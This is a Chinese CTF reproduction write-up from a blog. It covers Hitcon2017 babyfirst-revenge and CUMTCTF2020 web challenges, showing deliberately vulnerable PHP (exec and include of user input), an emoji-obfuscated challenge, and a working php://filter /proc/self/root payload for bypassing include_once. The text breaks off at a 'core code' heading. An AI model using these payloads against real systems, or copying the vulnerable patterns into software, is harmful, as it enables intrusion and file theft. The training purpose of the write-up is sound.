<!DOCTYPE html>
<html lang="en">
  <head><meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="description" content="复现wp"/><meta name="keywords" content="CTF" /><link rel="alternate" href="/atom.xml" title="M1key"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.11.0" />
<link rel="canonical" href="https://pz1o.top/2020/09/28/复现wp/"/>

<link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" /><script type="text/x-mathjax-config">
    MathJax.Hub.Config({ tex2jax: { inlineMath: [['$','$'], ['\\(','\\)']] } });
  </script>
  <script type="text/javascript" async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.11.0" />

<script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ac3e804c7e07addaaf3f80f2371f03e2";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script><script id="baidu_push">
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<script src="//cdn1.lncld.net/static/js/3.1.1/av-min.js"></script>
  <script id="leancloud">
    AV.init({
      appId: "KLWvKGPeSIyoEo4k6j3v37wy-gzGzoHsz",
      appKey: "FL93w3BBbF9lxiR8X1HI58En"
    });
  </script><script>
  window.config = {"leancloud":{"app_id":"KLWvKGPeSIyoEo4k6j3v37wy-gzGzoHsz","app_key":"FL93w3BBbF9lxiR8X1HI58En"},"toc":true,"fancybox":true,"pjax":"","latex":true};
</script>

    <title>复现wp - M1key</title>
  <meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="M1key" type="application/atom+xml">
</head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">M1key</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list"><a href="/">
        <li class="mobile-menu-item">Home
          </li>
      </a><a href="/archives/">
        <li class="mobile-menu-item">Archives
          </li>
      </a><a href="/tags/">
        <li class="mobile-menu-item">Tags
          </li>
      </a><a href="/about/">
        <li class="mobile-menu-item">About
          </li>
      </a></ul>
</nav>
<div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">M1key</a>
</div>

<nav class="site-navbar"><ul id="menu" class="menu"><li class="menu-item">
          <a class="menu-item-link" href="/">
            Home
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/archives/">
            Archives
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/tags/">
            Tags
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/about/">
            About
            </a>
        </li>
      </ul></nav>
</header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content"><article class="post">
    <header class="post-header">
      <h1 class="post-title">复现wp
        </h1>

      <div class="post-meta">
        <span class="post-time">
          2020-09-28
        </span><span class="post-category">
            <a href="/categories/CTF/">CTF</a>
            </span>
        <span class="post-visits"
             data-url="/2020/09/28/%E5%A4%8D%E7%8E%B0wp/"
             data-title="复现wp">
          Visits 0
        </span>
        </div>
    </header>

    <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">Contents</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Hitcon2017-babyfirst-reveng"><span class="toc-text">Hitcon2017 babyfirst-reveng</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#考点"><span class="toc-text">考点</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CUMTCTF2020"><span class="toc-text">CUMTCTF2020</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#简单的文件包含？"><span class="toc-text">简单的文件包含？</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#考点-1"><span class="toc-text">考点</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#👍🙌😃"><span class="toc-text">👍🙌😃</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#考点-2"><span class="toc-text">考点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#bcrypt"><span class="toc-text">bcrypt</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#命令执行"><span class="toc-text">命令执行</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EZnode"><span class="toc-text">EZnode</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#考点-3"><span class="toc-text">考点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ngnix"><span class="toc-text">ngnix</span></a></li></ol></li></ol>
    </div>
  </div><div class="post-content"><a id="more"></a>
<h2 id="Hitcon2017-babyfirst-reveng"><a href="#Hitcon2017-babyfirst-reveng" class="headerlink" title="Hitcon2017 babyfirst-reveng"></a>Hitcon2017 babyfirst-reveng</h2><p>github复现地址</p>
<p><a href="https://github.com/t3hp0rP/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge" target="_blank" rel="noopener">https://github.com/t3hp0rP/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge</a></p>
<h3 id="考点"><a href="#考点" class="headerlink" title="考点"></a>考点</h3><p>命令执行构造反弹shell</p>
<p>源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $sandbox = <span class="string">'/www/sandbox/'</span> . md5(<span class="string">"orange"</span> . $_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">    @mkdir($sandbox);</span><br><span class="line">    @chdir($sandbox);</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'cmd'</span>]) &amp;&amp; strlen($_GET[<span class="string">'cmd'</span>]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">        @exec($_GET[<span class="string">'cmd'</span>]);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'reset'</span>])) &#123;</span><br><span class="line">        @exec(<span class="string">'/bin/rm -rf '</span> . $sandbox);</span><br><span class="line">    &#125;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>
<p>先说几个知识点：</p>
<blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;e\</span><br><span class="line">&gt;cho\</span><br><span class="line">&#39;123&#39;</span><br><span class="line">&gt;123</span><br></pre></td></tr></table></figure>
<p>在linux中换行可以执行间断的命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># vi 1  //在1下写入cat flag.txt</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># touch flag.txt</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># echo "cumtctf&#123;i_am_so_cute&#125;" &gt;&gt; flag.txt</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># cat flag.txt</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">cumtctf&#123;i_am_so_cute&#125;</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># sh 1</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">cumtctf&#123;i_am_so_cute&#125;</span></span><br></pre></td></tr></table></figure>
<p>在Linux下面可以通过写入一个文件，文件里面的内容是系统命令，然后可以通过<code>sh filename</code>来执行文本里面的系统命令，如果有报错的话会自动跳过</p>
</blockquote>
<h1 id="CUMTCTF2020"><a href="#CUMTCTF2020" class="headerlink" title="CUMTCTF2020"></a>CUMTCTF2020</h1><h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="简单的文件包含？"><a href="#简单的文件包含？" class="headerlink" title="简单的文件包含？"></a>简单的文件包含？</h2><h3 id="考点-1"><a href="#考点-1" class="headerlink" title="考点"></a>考点</h3><p>require_once绕过</p>
<p>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> ($_SERVER[<span class="string">'HTTP_CLIENT_IP'</span>] != <span class="string">'127.0.0.1'</span> &amp;&amp; $_SERVER[<span class="string">'HTTP_X_REAL_IP'</span>] != <span class="string">'127.0.0.1'</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span> ($_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>] == <span class="string">"127.0.0.1"</span>) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"Do u think that I dont know X-Forwarded-For?&lt;br&gt;Too young too simple sometimes naive"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Sorry, this site is only optimized for those who comes from localhost"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include_once</span>(<span class="string">"flag.php"</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'f'</span>])) </span><br><span class="line">  <span class="keyword">include_once</span>($_POST[<span class="string">'f'</span>]);</span><br></pre></td></tr></table></figure>
<p>这里主要问题是<code>reuqire_once</code>的问题</p>
<p><a href="https://www.anquanke.com/post/id/213235#h3-2" target="_blank" rel="noopener">https://www.anquanke.com/post/id/213235#h3-2</a></p>
<p>这里面的源码解析有得还是看不懂，日后再翻</p>
<p>首先说一下php文件包含的机制是将<strong>已经包含的文件与文件的真实路径放进哈希表中</strong>，当已经<code>require_once(&#39;flag.php&#39;)</code>，已经include的文件不可以再<code>require_once</code>。</p>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;var&#x2F;www&#x2F;html&#x2F;flag.php</span><br></pre></td></tr></table></figure>
<blockquote>
<p>/proc/self指向当前进程的/proc/pid/</p>
<p>/proc/self/root/指向/的符号</p>
<p><img src="/2020/09/28/%E5%A4%8D%E7%8E%B0wp/image-20200928111221260.png" alt></p>
</blockquote>
<h2 id="👍🙌😃"><a href="#👍🙌😃" class="headerlink" title="👍🙌😃"></a>👍🙌😃</h2><h3 id="考点-2"><a href="#考点-2" class="headerlink" title="考点"></a>考点</h3><p>代码格式化、反混淆，bcrypt爆破，<strong>命令执行</strong></p>
<p>这个题 我只能说真的牛逼</p>
<p>真的开眼界 还可以这样</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">'vendor/autoload.php'</span>;</span><br><span class="line"><span class="keyword">use</span> <span class="title">Bcrypt</span>\<span class="title">Bcrypt</span>;</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">ini_set(<span class="string">"display_errors"</span>,<span class="string">"Off"</span>);</span><br><span class="line">$🙐=<span class="keyword">array</span>(<span class="string">'🙐'</span>,<span class="string">'🙑'</span>,<span class="string">'🙒'</span>,<span class="string">'🙓'</span>,<span class="string">'🙔'</span>,<span class="string">'🙕'</span>,<span class="string">'🙖'</span>,<span class="string">'🙗'</span>,<span class="string">'🙘'</span>,<span class="string">'🙙'</span>,<span class="string">'🙚'</span>,<span class="string">'🙛'</span>,<span class="string">'🙜'</span>,<span class="string">'🙝'</span>,<span class="string">'🙞'</span>,<span class="string">'🙟'</span>);</span><br><span class="line">$🙠=<span class="keyword">array</span>(<span class="string">'🙠'</span>,<span class="string">'🙡'</span>,<span class="string">'🙢'</span>,<span class="string">'🙣'</span>,<span class="string">'🙤'</span>,<span class="string">'🙥'</span>,<span class="string">'🙦'</span>,<span class="string">'🙧'</span>,<span class="string">'🙨'</span>,<span class="string">'🙩'</span>,<span class="string">'🙪'</span>,<span class="string">'🙫'</span>,<span class="string">'🙬'</span>,<span class="string">'🙭'</span>,<span class="string">'🙮'</span>,<span class="string">'🙯'</span>);</span><br><span class="line">$🙰=<span class="keyword">array</span>(<span class="string">'🙰'</span>,<span class="string">'🙱'</span>,<span class="string">'🙲'</span>,<span class="string">'🙳'</span>,<span class="string">'🙴'</span>,<span class="string">'🙵'</span>,<span class="string">'🙶'</span>,<span class="string">'🙷'</span>,<span class="string">'🙸'</span>,<span class="string">'🙹'</span>,<span class="string">'🙺'</span>,<span class="string">'🙻'</span>,<span class="string">'🙼'</span>,<span class="string">'🙽'</span>,<span class="string">'🙾'</span>,<span class="string">'🙿'</span>);</span><br><span class="line">$😀=<span class="keyword">array</span>(<span class="string">'😀'</span>,<span class="string">'😁'</span>,<span class="string">'😂'</span>,<span class="string">'😃'</span>,<span class="string">'😄'</span>,<span class="string">'😅'</span>,<span class="string">'😆'</span>,<span class="string">'😇'</span>,<span class="string">'😈'</span>,<span class="string">'😉'</span>,<span class="string">'😊'</span>,<span class="string">'😋'</span>,<span class="string">'😌'</span>,<span class="string">'😍'</span>,<span class="string">'😎'</span>,<span class="string">'😏'</span>);</span><br><span class="line">$😐=<span class="keyword">array</span>(<span class="string">'😐'</span>,<span class="string">'😑'</span>,<span class="string">'😒'</span>,<span class="string">'😓'</span>,<span class="string">'😔'</span>,<span class="string">'😕'</span>,<span class="string">'😖'</span>,<span class="string">'😗'</span>,<span class="string">'😘'</span>,<span class="string">'😙'</span>,<span class="string">'😚'</span>,<span class="string">'😛'</span>,<span class="string">'😜'</span>,<span class="string">'😝'</span>,<span class="string">'😞'</span>,<span class="string">'😟'</span>);</span><br><span class="line">$😠=<span class="keyword">array</span>(<span class="string">'😠'</span>,<span class="string">'😡'</span>,<span class="string">'😢'</span>,<span class="string">'😣'</span>,<span class="string">'😤'</span>,<span class="string">'😥'</span>,<span class="string">'😦'</span>,<span class="string">'😧'</span>,<span class="string">'😨'</span>,<span class="string">'😩'</span>,<span class="string">'😪'</span>,<span class="string">'😫'</span>,<span class="string">'😬'</span>,<span class="string">'😭'</span>,<span class="string">'😮'</span>,<span class="string">'😯'</span>);</span><br><span class="line">$😰=<span class="keyword">array</span>(<span class="string">'😰'</span>,<span class="string">'😱'</span>,<span class="string">'😲'</span>,<span class="string">'😳'</span>,<span class="string">'😴'</span>,<span class="string">'😵'</span>,<span class="string">'😶'</span>,<span class="string">'😷'</span>,<span class="string">'😸'</span>,<span class="string">'😹'</span>,<span class="string">'😺'</span>,<span class="string">'😻'</span>,<span class="string">'😼'</span>,<span class="string">'😽'</span>,<span class="string">'😾'</span>,<span class="string">'😿'</span>);</span><br><span class="line">$🙀=<span class="keyword">array</span>(<span class="string">'🙀'</span>,<span class="string">'🙁'</span>,<span class="string">'🙂'</span>,<span class="string">'🙃'</span>,<span class="string">'🙄'</span>,<span class="string">'🙅'</span>,<span class="string">'🙆'</span>,<span class="string">'🙇'</span>,<span class="string">'🙈'</span>,<span class="string">'🙉'</span>,<span class="string">'🙊'</span>,<span class="string">'🙋'</span>,<span class="string">'🙌'</span>,<span class="string">'🙍'</span>,<span class="string">'🙎'</span>,<span class="string">'🙏'</span>);</span><br><span class="line">$🏁 = <span class="keyword">array</span>($🙠,$🙠,$🙰,$😀,$😐,$😠,$😰,$🙀);</span><br><span class="line">$😳😃😢🙉😲😗😦🙅 = <span class="string">"strlen"</span>;</span><br><span class="line">$😩😂😸🙉 = <span class="string">"chr"</span>;</span><br><span class="line">$🎁 = <span class="string">"base64_decode"</span>;</span><br><span class="line">$😱😨😞🙊😪😨😡😍 = <span class="string">"isset"</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> 😪😗😦😺😲😂😢😼<span class="params">($😳😃😢🙉)</span> </span>&#123;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$😳😃😢🙉😲😗😦🙅,$😩😂😸🙉,$🎁,$😱😨😞🙊😪😨😡😍;</span><br><span class="line">	$😲😗😦🙅= (<span class="string">"$😳😃😢🙉😲😗😦🙅"</span>)($😳😃😢🙉)/<span class="number">4</span>;</span><br><span class="line">	$😳😂😚😼 = <span class="string">""</span>;</span><br><span class="line">	<span class="keyword">for</span> ($😱😧😼🙀 = <span class="number">0</span>;$😱😧😼🙀&lt;$😲😗😦🙅;$😱😧😼🙀++) &#123;</span><br><span class="line">		$😩😂😦🙃 =$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">1</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">2</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">3</span>];</span><br><span class="line">		$😪😾😞😀 =<span class="number">0</span>;</span><br><span class="line">		$😳😂😦😺 =<span class="number">0</span>;</span><br><span class="line">		<span class="keyword">for</span> ($😱😽🙀🙁 =<span class="number">0</span>;$😱😽🙀🙁&lt;<span class="number">8</span>;$😱😽🙀🙁++) &#123;</span><br><span class="line">			<span class="keyword">for</span> ($😱😂🙄🙂=<span class="number">0</span>;$😱😂🙄🙂&lt;<span class="number">16</span>;$😱😂🙄🙂++) &#123;</span><br><span class="line">				<span class="keyword">if</span>($😩😂😦🙃 == $🏁[$😱😽🙀🙁][$😱😂🙄🙂]) &#123;</span><br><span class="line">					$😪😾😞😀=$😱😽🙀🙁;</span><br><span class="line">					$😳😂😦😺 = $😱😂🙄🙂;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		$😲😾😦🙄 = $😪😾😞😀*<span class="number">16</span>+$😳😂😦😺;</span><br><span class="line">		$😳😂😚😼 = $😳😂😚😼.(<span class="string">"$😩😂😸🙉"</span>)($😲😾😦🙄);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> (<span class="string">"$🎁"</span>)($😳😂😚😼);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> 😁😁<span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$😳😃😢🙉😲😗😦🙅,$😩😂😸🙉,$🎁,$😱😨😞🙊😪😨😡😍;</span><br><span class="line">	$😳😂😖🙅😪😗😚 = 😪😗😦😺😲😂😢😼(😜😃😪😸😳😹😉😃😴😃😳🙆😱😘😢🙄😲😓😉🙊😩😧😅😻😩😽😉😄😜🙇😍😍).😪😗😦😺😲😂😢😼(😲😧😡😁)($_SERVER[😪😗😦😺😲😂😢😼(😥😻😦😞😤😁😢😖😨😀😖😕😢😖😙😍)]);</span><br><span class="line">	😪😗😦😺😲😂😢😼(😲😧🙄😻😱😨😙😍)($😳😂😖🙅😪😗😚);</span><br><span class="line">	😪😗😦😺😲😂😢😼(😩😂😸😻😱😨😙😍)($😳😂😖🙅😪😗😚);</span><br><span class="line">	<span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[😪😗😦😺😲😂😢😼(😩😂😁😻)]) &amp;&amp; ($😳😃😢🙉😲😗😦🙅)($_GET[😪😗😦😺😲😂😢😼(😩😂😁😻)]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">		@😪😗😦😺😲😂😢😼(😪😨😸😼😩🙇😍😍)($_GET[😪😗😦😺😲😂😢😼(😩😂😁😻)]);</span><br><span class="line">	&#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[😪😗😦😺😲😂😢😼(😳😽😦🙊😪😨😡😍)])) &#123;</span><br><span class="line">		@😪😗😦😺😲😂😢😼(😪😨😸😼😩🙇😍😍)(😪😗😦😺😲😂😢😼(😳😽😀😷😜😨😚😽😙😑😍😍) . $😳😂😖🙅😪😗😚);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$🎯 = <span class="keyword">new</span> Bcrypt();</span><br><span class="line">$🔑 = $_POST[😪😗😦😺😲😂😢😼(😳😗😖🙊😳😃😴😻)];</span><br><span class="line">$🔒 = 😪😗😦😺😲😂😢😼(😚😔😚😅😚😔😕🙇😚😖😚😓😪😽😻😄😥😨😒😛😣😼😖😢😲😥🙀😕😞😻😪😅😲😘😦🙉😣😽😦🙈😲😦😑🙅😞😽😞😞😲😺😴😀😪😗😉😜😩😃🙀😝😝😾😩😅😱😖😞😺😪😔😼😆😢😗😿🙊😴😁😸😼);</span><br><span class="line"><span class="keyword">if</span>($🎯-&gt;verify($🔑, $🔒)) &#123;</span><br><span class="line">	<span class="keyword">echo</span>(😪😗😦😺😲😂😢😼(😠😓😉😹😳😺😅😡😩😨😞🙊😴😂😉🙉😪😓😒😂😪😨😚🙀😪😽😼😼😪😓😕😈😜😂😚🙉😠😷😍😍));</span><br><span class="line">	<span class="keyword">echo</span>(😪😗😦😺😲😂😢😼(😦😂😉😃😙😣😖😟😲😃😳🙃😱😗😖😺😱🙉😒🙀😴😓😕😈😜😂😚🙉😠😷😍😍));</span><br><span class="line">	😁😁();</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">	<span class="keyword">echo</span>(😪😗😦😺😲😂😢😼(😠😓😉😹😳😺😅😡😩😨😞🙊😴😂😉🙉😪😓😒🙅😲😃😡😷😲😧😖😀😩😂😷😸😠😓😉😹😳😺😄😍));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>首先是代码格式化，接着就是<strong>理解代码的执行逻辑，顺便改变代码逻辑</strong></p>
<p>看题解上看的是第一个函数，也就是混淆</p>
<p>为什么要先看第一个函数</p>
<p><img src="/2020/09/28/%E5%A4%8D%E7%8E%B0wp/image-20200929221307190.png" alt="image-20200929221307190"></p>
<p>所以我们就想直接看在不同参数下第一个函数执行输出的结果，所以在第一个函数中添加</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> 😪😗😦😺😲😂😢😼<span class="params">($😳😃😢🙉)</span> </span>&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"加密后："</span>.$😳😃😢🙉;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$😳😃😢🙉😲😗😦🙅,$😩😂😸🙉,$🎁,$😱😨😞🙊😪😨😡😍;</span><br><span class="line">	$😲😗😦🙅= (<span class="string">"$😳😃😢🙉😲😗😦🙅"</span>)($😳😃😢🙉)/<span class="number">4</span>;</span><br><span class="line">	$😳😂😚😼 = <span class="string">""</span>;</span><br><span class="line">	<span class="keyword">for</span> ($😱😧😼🙀 = <span class="number">0</span>;$😱😧😼🙀&lt;$😲😗😦🙅;$😱😧😼🙀++) &#123;</span><br><span class="line">		$😩😂😦🙃 =$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">1</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">2</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">3</span>];</span><br><span class="line">		$😪😾😞😀 =<span class="number">0</span>;</span><br><span class="line">		$😳😂😦😺 =<span class="number">0</span>;</span><br><span class="line">		<span class="keyword">for</span> ($😱😽🙀🙁 =<span class="number">0</span>;$😱😽🙀🙁&lt;<span class="number">8</span>;$😱😽🙀🙁++) &#123;</span><br><span class="line">			<span class="keyword">for</span> ($😱😂🙄🙂=<span class="number">0</span>;$😱😂🙄🙂&lt;<span class="number">16</span>;$😱😂🙄🙂++) &#123;</span><br><span class="line">				<span class="keyword">if</span>($😩😂😦🙃 == $🏁[$😱😽🙀🙁][$😱😂🙄🙂]) &#123;</span><br><span class="line">					$😪😾😞😀=$😱😽🙀🙁;</span><br><span class="line">					$😳😂😦😺 = $😱😂🙄🙂;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		$😲😾😦🙄 = $😪😾😞😀*<span class="number">16</span>+$😳😂😦😺;</span><br><span class="line">		$😳😂😚😼 = $😳😂😚😼.(<span class="string">"$😩😂😸🙉"</span>)($😲😾😦🙄);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"原文："</span>.(<span class="string">"$🎁"</span>)($😳😂😚😼);</span><br><span class="line">	<span class="keyword">return</span> (<span class="string">"$🎁"</span>)($😳😂😚😼);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>之后依次修改代码逻辑，替换其中第一个函数输出结果</p>
<p>核心代码</p>
